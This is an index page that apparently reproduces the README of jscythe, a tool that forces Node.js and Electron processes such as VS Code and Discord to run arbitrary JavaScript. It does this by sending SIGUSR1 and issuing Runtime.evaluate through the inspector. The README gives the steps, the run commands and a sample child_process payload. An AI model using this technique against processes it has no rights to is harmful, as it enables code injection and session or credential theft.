Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/evilsocket/jscythe

Abuse the node.js inspector mechanism in order to force any node.js/electron/v8 based process to execute arbitrary javascript code.
https://github.com/evilsocket/jscythe

Last synced: 11 days ago
JSON representation

Abuse the node.js inspector mechanism in order to force any node.js/electron/v8 based process to execute arbitrary javascript code.

Host: GitHub
URL: https://github.com/evilsocket/jscythe
Owner: evilsocket
License: other
Created: 2022-08-29T18:35:53.000Z (about 2 years ago)
Default Branch: main
Last Pushed: 2024-09-09T23:26:29.000Z (about 2 months ago)
Last Synced: 2024-09-10T03:44:44.890Z (about 2 months ago)
Language: Rust
Size: 45.9 KB
Stars: 312
Watchers: 7
Forks: 26
Open Issues: 1
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

StarryDivineSky - evilsocket/jscythe

README

jscythe abuses the node.js [inspector mechanism](https://nodejs.org/en/docs/guides/debugging-getting-started/) in order to force any node.js/electron/v8 based process to execute arbitrary javascript code, even if their debugging capabilities are disabled.

![vscode](https://i.imgur.com/MmUupgZ.jpg)

Tested and working against Visual Studio Code, Discord, any Node.js application and more!

## How

1. Locate the target process.
2. Send `SIGUSR1` signal to the process, this will enable the debugger on a port (depending on the software, sometimes it's random, sometimes it's not).
3. Determine debugging port by diffing open ports before and after sending `SIGUSR1`.
4. Get the websocket debugging URL and session id from `http://localhost:/json`.
5. Send a `Runtime.evaluate` request with the provided code.
6. Profit.

## Building

```sh
cargo build --release
```

## Running

Target a specific process and execute a basic expression:

```sh
./target/release/jscythe --pid 666 --code "5 - 3 + 2"
```

Execute code from a file:

```sh
./target/release/jscythe --pid 666 --script example_script.js
```

The `example_script.js` can require any node module and execute any code, like:

```js
require('child_process').spawnSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator', { encoding : 'utf8' }).stdout
```

Search process by expression:

```sh
./target/release/jscythe --search extensionHost --script example_script.js
```

## Other options

Run `jscythe --help` for the complete list of options.

## License

This project is made with ♥ by [@evilsocket](https://twitter.com/evilsocket) and it is released under the GPL3 license.